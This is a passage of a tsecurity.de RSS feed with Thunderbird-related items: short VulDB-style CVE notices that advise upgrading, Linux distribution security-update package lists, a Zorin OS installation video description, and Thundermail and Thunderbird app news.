It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-57963 | Mozilla Thunderbird up to 140.12.0/152.0.0 ui layer (EUVD-2026-40862)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 140.12.0/152.0.0. It has been rated as problematic. This impacts an unknown function. Performing a manipulation results in improper restriction of rendered ui layers.

This vulnerability is known as CVE-2026-57963. Remote exploitation of the ...]]></description>
<link>https://tsecurity.de/de/3637415/sicherheitsluecken/cve-2026-57963-mozilla-thunderbird-up-to-14012015200-ui-layer-euvd-2026-40862/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637415/sicherheitsluecken/cve-2026-57963-mozilla-thunderbird-up-to-14012015200-ui-layer-euvd-2026-40862/</guid>
<pubDate>Wed, 01 Jul 2026 07:08:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 140.12.0/152.0.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function. Performing a manipulation results in improper restriction of rendered ui layers.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-57963">CVE-2026-57963</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (git-lfs, perl-Archive-Tar, perl-IO-Compress, python3.12-urllib3, and runc), Debian (sogo), Fedora (perl-DBI and perl-Socket), Oracle (firefox, freerdp, git-lfs, libsoup, libxml2, mod_md, mysql, perl-Archive-Tar, perl-IO-Compress, python, python3.12-...]]></description>
<link>https://tsecurity.de/de/3635696/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635696/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 30 Jun 2026 15:11:05 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (git-lfs, perl-Archive-Tar, perl-IO-Compress, python3.12-urllib3, and runc), <b>Debian</b> (sogo), <b>Fedora</b> (perl-DBI and perl-Socket), <b>Oracle</b> (firefox, freerdp, git-lfs, libsoup, libxml2, mod_md, mysql, perl-Archive-Tar, perl-IO-Compress, python, python3.12-urllib3, rsync, thunderbird, tomcat, xorg-x11-server, and xorg-x11-server-Xwayland), <b>SUSE</b> (389-ds, 7zip, alsa, amazon-ecs-init, amazon-ssm-agent, ansible-core, apache2, atril, avahi, bind, bitcoin, capnproto, chromedriver, chromium, cosign, distribution, dnsdist, docker, dovecot24, dracut, firefox, firewalld, freeipmi, freerdp, giflib, gimp, gleam, glib-networking, glibc, glycin-loaders, golang-github-prometheus-alertmanager, google-cloud-sap-agent, google-guest-agent, graphite2, gsasl, hamlib, helm, himmelblau, ignition, imagemagick, istioctl, jackson-databind, jq, jupyter-jupyterlab-templates, keylime, krb5, ldns, libaom, libcaca, libgcrypt, libheif, libinput, libjxl, libnfs, libslirp-devel, libsolv, libzypp, zypper, libssh2_org, libvncserver, libyang, lldpd, logback, loupe, mbedtls, mbedtls-2, mcphost, mozjs128, mutt, nano, nginx, ocaml, ofono, openCryptoki, opencryptoki, opensc, openssh, openssl-3, papers, perl-compress-raw-zlib, perl-config-inifiles, perl-cpanel-json-xs, perl-crypt-passwdmd5, perl-DBI, perl-dbi, perl-html-parser, perl-http-daemon, perl-libwww-perl, perl-protocol-http2, postfix, postgresql14, postgresql15, postgresql16, python-aiohttp, python-biopython, python-click, python-ecdsa, python-idna, python-markdown, python-joblib,, python-paramiko, python-pdm, python-pip, python-py7zr, python-pydata-sphinx-theme, python-pyjwt, python-python-multipart, python-starlette, python-tornado6, python311-jupyter-ydoc, rpcbind, sed, sg3_utils, sqlite3, strongswan, tar, thunderbird, tomcat, tomcat10, tomcat11, trivy, unbound, util-linux, warewulf4, webkit2gtk3, xar, xwayland, yt-dlp, and zypper, libzypp, libsolv), and <b>Ubuntu</b> (libheif, nss, qemu, roundcube, and sqlite3).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3634529/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634529/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Tue, 30 Jun 2026 06:45:58 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (containernetworking-plugins, golang, kernel, libpng, libpng15, nginx, opencryptoki, perl-IO-Compress, thunderbird, and tigervnc), Debian (chromium, gdcm, incus, libhtml-parser-perl, lxd, openvpn, tor, and xorg-server), Fedora (chromium, docker-build...]]></description>
<link>https://tsecurity.de/de/3633025/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633025/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 29 Jun 2026 15:24:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (containernetworking-plugins, golang, kernel, libpng, libpng15, nginx, opencryptoki, perl-IO-Compress, thunderbird, and tigervnc), <b>Debian</b> (chromium, gdcm, incus, libhtml-parser-perl, lxd, openvpn, tor, and xorg-server), <b>Fedora</b> (chromium, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, krita, ldns, libssh2, liferea, lighttpd, mariadb10.11, mariadb11.8, moby-engine, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, openbao, pacemaker, pgadmin4, podman-tui, prometheus-podman-exporter, python-jupyter-server, python-mistune, python-postorius, python-pydantic-settings, python3-docs, python3.14, thunderbird, tigervnc, tinyproxy, and util-linux), <b>Mageia</b> (krb5), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, dracut, fence-agents, firefox, frr, frr10, glib2, glibc, gnutls, golang, kernel, libpng, libpng15, libreoffice, libxml2, libxslt, mod_http2, mysql:8.4, nginx:1.26, openssl, php:8.3, podman, postgresql-jdbc, python3.14, redis, rsync, thunderbird, tomcat, valkey, and vim), <b>Red Hat</b> (osbuild-composer), and <b>SUSE</b> (agama-web-ui, asn1c, assimp, assimp-devel, aws-iam-authenticator, calibre, clamav, corepack24, dovecot22, exiv2, frr, giflib, glances-common, google-osconfig-agent, GraphicsMagick, gvim, haproxy, hydra, ImageMagick, jupyter-nbclassic, kernel, libsoup, libsoup2, libssh2-1, nano, NetworkManager-applet-openvpn, nodejs22, openbabel, opensc, openssl-3, pacemaker, python, python-base, python-doc, python311-pdm, python311-py7zr, python311-pypdf, python36, tar, trivy, util-linux, xen, and xtrabackup).]]></content:encoded>
</item>
<item>
<title><![CDATA[Installation und Einführung von Zorin OS - Tutorial für Anfänger]]></title>
<description><![CDATA[Author: Linux Guides - Bewertung: 10x - Views:96 In diesem Video zeigt Jean, wie man Zorin OS parallel zu Windows installiert und so optimal mit Linux durchstarten kann.
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen Kommentar. Vielen Dank!

Links:
---...]]></description>
<link>https://tsecurity.de/de/3627596/linux-tipps/installation-und-einfuehrung-von-zorin-os-tutorial-fuer-anfaenger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627596/linux-tipps/installation-und-einfuehrung-von-zorin-os-tutorial-fuer-anfaenger/</guid>
<pubDate>Fri, 26 Jun 2026 15:40:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Linux Guides - Bewertung: 10x - Views:96 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/cvTboRfwl3E?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In diesem Video zeigt Jean, wie man Zorin OS parallel zu Windows installiert und so optimal mit Linux durchstarten kann.<br />
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen Kommentar. Vielen Dank!<br />
<br />
Links:<br />
-------------------------------------<br />
Falls sich die Windows-Partition nicht ausreichend verkleinern lässt, liegt dies oft an der Auslagerungsdatei. Hilfe dazu findet man z.B. in verschiedenen Foren: https://forum.linuxguides.de/index.php?thread/10697-windows-partition-l%C3%A4sst-sich-nicht-verkleinern/<br />
<br />
- ZorinOS herunterladen: https://zorin.com/os/download/<br />
- https://rufus.ie/de/<br />
- ehrenamtliche Hilfe durch die Linux Helden: https://www.linuxguides.de/linux-helden-karte/<br />
- Du suchst eine gute Cloud Lösung? https://www.libre-workspace.org/cloud/<br />
- Linux Assistant: https://www.linux-assistant.org/<br />
<br />
Videoempfehlungen:<br />
- Alles zur Firewall: https://youtu.be/gSq1W3qfKBs<br />
- LibreOffice Writer einrichten wie Microsoft Word: https://youtu.be/Hms467GhynE<br />
- Crashkurs zu Writer (Word Alternative): https://youtu.be/QyakKLNv7Yg<br />
- Crashkurs zu Calc (Excel Alternative): https://youtu.be/ioAxN27CIUA<br />
- Thunderbird Tutorial (Mailclient): https://youtu.be/eAgCsvQV7ZE<br />
- Windows in einer Box: https://youtu.be/CAditqMhYrA<br />
<br />
- Linux-Guides Merch*: https://linux-guides.myspreadshop.de/<br />
- Professioneller Linux Support*: https://www.linuxguides.de/linux-support/<br />
- Linux-Arbeitsplatz für KMU & Einzelpersonen*: https://www.linuxguides.de/linux-arbeitsplatz/<br />
- Linux Mint Kurs für Anwender*: https://www.linuxguides.de/kurs-linux-mint-fur-anwender/<br />
- Offizielle Webseite: https://www.linuxguides.de<br />
- Forum: https://forum.linuxguides.de/<br />
- Unterstützen: http://unterstuetzen.linuxguides.de<br />
- Mastodon: https://mastodon.social/@LinuxGuides<br />
- X: https://twitter.com/LinuxGuides<br />
- Instagram: https://www.instagram.com/linuxguides/<br />
- Kontakt: https://www.linuxguides.de/kontakt/<br />
<br />
Inhaltsverzeichnis:<br />
-------------------------------------<br />
00:00 Begrüßung<br />
00:44 ZorinOS und Rufus herunterladen<br />
02:19 Festplattenkonfiguration ändern<br />
03:41 Abbild auf USB-Stick erstellen<br />
07:10 Hilfe durch Linux Helden<br />
08:33 Vom USB-Stick starten<br />
09:55 Installation<br />
14:14 Willkommensbildschirm<br />
17:48 Treiber, Firewall<br />
20:15 Software installieren<br />
26:20 Einstellungen<br />
30:12 Dateimanager<br />
32:36 Finale Hinweise<br />
37:55 Verabschiedung<br />
<br />
Haftungsausschluss:<br />
-------------------------------------<br />
Das Video dient lediglich zu Informationszwecken. Wir übernehmen keinerlei Haftung für in diesem Video gezeigte und / oder erklärte Handlungen. Es entsteht in keinem Moment Anspruch auf Schadensersatz oder ähnliches.<br />
<br />
*) Werbung<br />
<br />
#linuxguides #zorinos #linux #opensource<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3625925/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625925/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Fri, 26 Jun 2026 00:01:21 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird Monthly Development Digest: June 2026]]></title>
<description><![CDATA[Welcome back from the Thunderbird development team! The past few months have been exceptionally busy across the project. As we approach the midpoint of the year, we’ve been focused on a mixture of delivering user-facing features, investing in long-term architectural improvements, and preparing fo...]]></description>
<link>https://tsecurity.de/de/3625628/tools/thunderbird-monthly-development-digest-june-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625628/tools/thunderbird-monthly-development-digest-june-2026/</guid>
<pubDate>Thu, 25 Jun 2026 20:38:50 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welcome back from the Thunderbird development team! The past few months have been exceptionally busy across the project. As we approach the midpoint of the year, we’ve been focused on a mixture of delivering user-facing features, investing in long-term architectural improvements, and preparing for the next ESR cycle. A significant amount of effort has gone […]</p>
<p>The post <a href="https://blog.thunderbird.net/2026/06/thunderbird-monthly-development-digest-june-2026/">Thunderbird Monthly Development Digest: June 2026</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (libpng, libsolv, libtasn1, libxml2, libxslt, python3.14, tigervnc, and vim), Debian (cloud-init, postgresql-13, and yelp), Mageia (nats-server), Oracle (.NET 10.0, .NET 8.0, .NET 9.0, bind9.18, cockpit, compat-openssl11, dnsmasq, dovecot, evince, ex...]]></description>
<link>https://tsecurity.de/de/3624688/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624688/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 25 Jun 2026 15:25:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (libpng, libsolv, libtasn1, libxml2, libxslt, python3.14, tigervnc, and vim), <b>Debian</b> (cloud-init, postgresql-13, and yelp), <b>Mageia</b> (nats-server), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind9.18, cockpit, compat-openssl11, dnsmasq, dovecot, evince, expat, flatpak, freerdp, gimp, golang, grafana, grafana-pcp, httpd, jmc, jq, kernel, libsndfile, libsoup, libtiff, mod_http2, mysql:8.0, nginx, nginx:1.24, openexr, php:8.2, poppler, pyOpenSSL, python-markdown, redis:7, samba, thunderbird, tigervnc, unbound, and vim), <b>Red Hat</b> (libpng, libpng12, and libpng15), <b>SUSE</b> (apptainer, bind, crun, freeipmi, ghc-crypton-x509-store, ghc-crypton-x509-system, google-guest-agent, google-osconfig-agent, GraphicsMagick, gstreamer-plugins-bad, hamlib, iproute2, java-1_8_0-openjdk, kubevirt1, libarchive, libheif, libpng15, mbedtls, mbedtls-2, openssl-1_1, python-biopython, python-PyJWT, tar, webkit2gtk3, and xen), and <b>Ubuntu</b> (ffmpeg, libdbi-perl, and perl).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (corosync, firefox, kernel, kernel-rt, libpq, memcached, postgresql, postgresql16, postgresql:13, postgresql:16, python-urllib3, python3.14-urllib3, redis:6, skopeo, and vim), Debian (beets, gst-plugins-bad1.0, imagemagick, libmatio, python-urllib3, ...]]></description>
<link>https://tsecurity.de/de/3621514/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621514/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 24 Jun 2026 15:25:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (corosync, firefox, kernel, kernel-rt, libpq, memcached, postgresql, postgresql16, postgresql:13, postgresql:16, python-urllib3, python3.14-urllib3, redis:6, skopeo, and vim), <b>Debian</b> (beets, gst-plugins-bad1.0, imagemagick, libmatio, python-urllib3, and u-boot), <b>Fedora</b> (chromium, coturn, frr, grout, materialx, perl-Crypt-DSA, and yt-dlp), <b>Mageia</b> (opensc, perl-Archive-Tar, and podofo), <b>Oracle</b> (fence-agents, libpq, mysql:8.4, and postgresql:16), <b>Red Hat</b> (firefox, libpng, libpng12, libpng15, libreoffice, nginx:1.24, thunderbird, tigervnc, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Slackware</b> (libarchive), <b>SUSE</b> (amazon-ssm-agent, ansible-core, apache2, bind, bitcoin-qt6, containerized-data-importer, curl, distribution, docker-stable, dovecot24, dracut, editorconfig-core-c, exiv2, firefox, freeipmi, freerdp, ghc-aws, ghc-crypton-asn1-encoding, ghc-crypton-asn1-parse, ghc-crypton-asn1-types, ghc-crypton-pem, glib-networking, go1.25, go1.26, google-guest-agent, graphite2, hamlib, helm, himmelblau, ignition, ImageMagick, kernel, ldns, libarchive, libcaca, libheif, libinput, libjxl, libsolv, libzypp, zypper, LibVNCServer, libxslt, libyang, mcphost, mozjs128, ncurses, nginx, opensc, openssl-3, openvswitch, papers, perl-HTML-Parser, perl-HTTP-Daemon, perl-Protocol-HTTP2, podman, postgresql14, postgresql15, postgresql16, postgresql17, python-aiohttp, python-ecdsa, python-paramiko, python-PyJWT, python-starlette, rekor, sqlite3, strongswan, tiff, tomcat, tomcat10, tomcat11, unbound, webkit2gtk3, xwayland, and zypper, libzypp, libsolv), and <b>Ubuntu</b> (libcap2, libnfs, libvncserver, libxml2, and mysql-8.0).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thundermail: Thunderbird benennt Abo-Angebot um und priorisiert Webmail]]></title>
<description><![CDATA[Das Thunderbird-Team hat ein neues Statusupdate zu Thundermail veröffentlicht und zieht nach den ersten Einladungswellen für den Beta-Test ein erstes Fazit. Dabei gibt es nicht nur einen Einblick in das Nutzerfeedback, sondern auch eine wichtige Änderung bei der Produktstrategie. Künftig...Zum Be...]]></description>
<link>https://tsecurity.de/de/3621077/it-nachrichten/thundermail-thunderbird-benennt-abo-angebot-um-und-priorisiert-webmail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621077/it-nachrichten/thundermail-thunderbird-benennt-abo-angebot-um-und-priorisiert-webmail/</guid>
<pubDate>Wed, 24 Jun 2026 13:03:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Thunderbird-Team hat ein neues Statusupdate zu Thundermail veröffentlicht und zieht nach den ersten Einladungswellen für den Beta-Test ein erstes Fazit. Dabei gibt es nicht nur einen Einblick in das Nutzerfeedback, sondern auch eine wichtige Änderung bei der Produktstrategie. Künftig...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thundermail-thunderbird-benennt-abo-angebot-um-und-priorisiert-webmail/">Thundermail: Thunderbird benennt Abo-Angebot um und priorisiert Webmail</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird: Webmail-Alpha kommt im nächsten Monat]]></title>
<description><![CDATA[Thunderbird passt Roadmap an: Eine Webmail-Oberfläche kommt schon bald als frühe Alpha. Auch 2FA, Mailzustellung und Onboarding werden verbessert.]]></description>
<link>https://tsecurity.de/de/3620558/it-nachrichten/thunderbird-webmail-alpha-kommt-im-naechsten-monat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620558/it-nachrichten/thunderbird-webmail-alpha-kommt-im-naechsten-monat/</guid>
<pubDate>Wed, 24 Jun 2026 09:47:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thunderbird passt Roadmap an: Eine Webmail-Oberfläche kommt schon bald als frühe Alpha. Auch 2FA, Mailzustellung und Onboarding werden verbessert.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thundermail June 2026 update: what we learned after the first few waves of invites]]></title>
<description><![CDATA[Over the past several weeks, we have been welcoming early users from our waitlist into Thundermail, a few waves at a time. Many of you are now setting up your accounts, trying things out, and sharing your thoughts with us. Naming updates You may have noticed that we are now saying Thundermail mor...]]></description>
<link>https://tsecurity.de/de/3619216/tools/thundermail-june-2026-update-what-we-learned-after-the-first-few-waves-of-invites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619216/tools/thundermail-june-2026-update-what-we-learned-after-the-first-few-waves-of-invites/</guid>
<pubDate>Tue, 23 Jun 2026 19:54:14 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Over the past several weeks, we have been welcoming early users from our waitlist into Thundermail, a few waves at a time. Many of you are now setting up your accounts, trying things out, and sharing your thoughts with us. Naming updates You may have noticed that we are now saying Thundermail more often, and […]</p>
<p>The post <a href="https://blog.thunderbird.net/2026/06/thundermail-june-2026-update-what-we-learned-after-the-first-few-waves-of-invites/">Thundermail June 2026 update: what we learned after the first few waves of invites</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 20.0 für Android: Thundermail-Anbindung und zahlreiche Fehlerbehebungen]]></title>
<description><![CDATA[Die Thunderbird-Macher haben Version 20.0 ihrer mobilen App veröffentlicht. Das Update bringt keine riesige Funktionsflut mit, liefert aber eine interessante Neuerung und räumt an einigen Ecken auf. Neu ist vor allem eine deutlich besser sichtbare Möglichkeit, das kommende Thundermail einzurichte...]]></description>
<link>https://tsecurity.de/de/3617325/it-nachrichten/thunderbird-200-fuer-android-thundermail-anbindung-und-zahlreiche-fehlerbehebungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617325/it-nachrichten/thunderbird-200-fuer-android-thundermail-anbindung-und-zahlreiche-fehlerbehebungen/</guid>
<pubDate>Tue, 23 Jun 2026 08:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Thunderbird-Macher haben Version 20.0 ihrer mobilen App veröffentlicht. Das Update bringt keine riesige Funktionsflut mit, liefert aber eine interessante Neuerung und räumt an einigen Ecken auf. Neu ist vor allem eine deutlich besser sichtbare Möglichkeit, das kommende Thundermail einzurichten...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-20-0-fuer-android-thundermail-anbindung-und-zahlreiche-fehlerbehebungen/">Thunderbird 20.0 für Android: Thundermail-Anbindung und zahlreiche Fehlerbehebungen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38477 | Mozilla Thunderbird up to 102.1 memory corruption (EUVD-2022-41060)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Mozilla Thunderbird up to 102.1. Affected by this issue is some unknown functionality. This manipulation causes memory corruption.

This vulnerability is registered as CVE-2022-38477. Remote exploitation of the attack is possible. No exploit...]]></description>
<link>https://tsecurity.de/de/3616480/sicherheitsluecken/cve-2022-38477-mozilla-thunderbird-up-to-1021-memory-corruption-euvd-2022-41060/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616480/sicherheitsluecken/cve-2022-38477-mozilla-thunderbird-up-to-1021-memory-corruption-euvd-2022-41060/</guid>
<pubDate>Mon, 22 Jun 2026 21:24:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102.1</a>. Affected by this issue is some unknown functionality. This manipulation causes memory corruption.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2022-38477">CVE-2022-38477</a>. Remote exploitation of the attack is possible. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38478 | Mozilla Thunderbird up to 102.1 memory corruption (EUVD-2022-41061)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Mozilla Thunderbird up to 102.1. This affects an unknown part. Such manipulation leads to memory corruption.

This vulnerability is documented as CVE-2022-38478. The attack can be executed remotely. There is not any exploit available.

...]]></description>
<link>https://tsecurity.de/de/3616477/sicherheitsluecken/cve-2022-38478-mozilla-thunderbird-up-to-1021-memory-corruption-euvd-2022-41061/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616477/sicherheitsluecken/cve-2022-38478-mozilla-thunderbird-up-to-1021-memory-corruption-euvd-2022-41061/</guid>
<pubDate>Mon, 22 Jun 2026 21:24:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102.1</a>. This affects an unknown part. Such manipulation leads to memory corruption.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2022-38478">CVE-2022-38478</a>. The attack can be executed remotely. There is not any exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38472 | Mozilla Thunderbird up to 102.1 XSLT Error clickjacking (Bug 1769155 / EUVD-2022-41055)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Mozilla Thunderbird up to 102.1. This impacts an unknown function of the component XSLT Error Handler. Executing a manipulation can lead to clickjacking.

This vulnerability is tracked as CVE-2022-38472. The attack can be launched rem...]]></description>
<link>https://tsecurity.de/de/3615862/sicherheitsluecken/cve-2022-38472-mozilla-thunderbird-up-to-1021-xslt-error-clickjacking-bug-1769155-euvd-2022-41055/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615862/sicherheitsluecken/cve-2022-38472-mozilla-thunderbird-up-to-1021-xslt-error-clickjacking-bug-1769155-euvd-2022-41055/</guid>
<pubDate>Mon, 22 Jun 2026 16:56:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102.1</a>. This impacts an unknown function of the component <em>XSLT Error Handler</em>. Executing a manipulation can lead to clickjacking.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2022-38472">CVE-2022-38472</a>. The attack can be launched remotely. No exploit exists.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38473 | Mozilla Thunderbird up to 102.1 XSLT Document cross-domain policy (Bug 1771685 / EUVD-2022-41056)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Mozilla Thunderbird up to 102.1. Affected is an unknown function of the component XSLT Document Handler. The manipulation leads to permissive cross-domain policy with untrusted domains.

This vulnerability is listed as CVE-2022-38473. Th...]]></description>
<link>https://tsecurity.de/de/3615861/sicherheitsluecken/cve-2022-38473-mozilla-thunderbird-up-to-1021-xslt-document-cross-domain-policy-bug-1771685-euvd-2022-41056/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615861/sicherheitsluecken/cve-2022-38473-mozilla-thunderbird-up-to-1021-xslt-document-cross-domain-policy-bug-1771685-euvd-2022-41056/</guid>
<pubDate>Mon, 22 Jun 2026 16:56:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102.1</a>. Affected is an unknown function of the component <em>XSLT Document Handler</em>. The manipulation leads to permissive cross-domain policy with untrusted domains.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2022-38473">CVE-2022-38473</a>. The attack may be initiated remotely. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38476 | Mozilla Thunderbird up to 102.1 PK11_ChangePW use after free (Bug 1760998 / EUVD-2022-41059)]]></title>
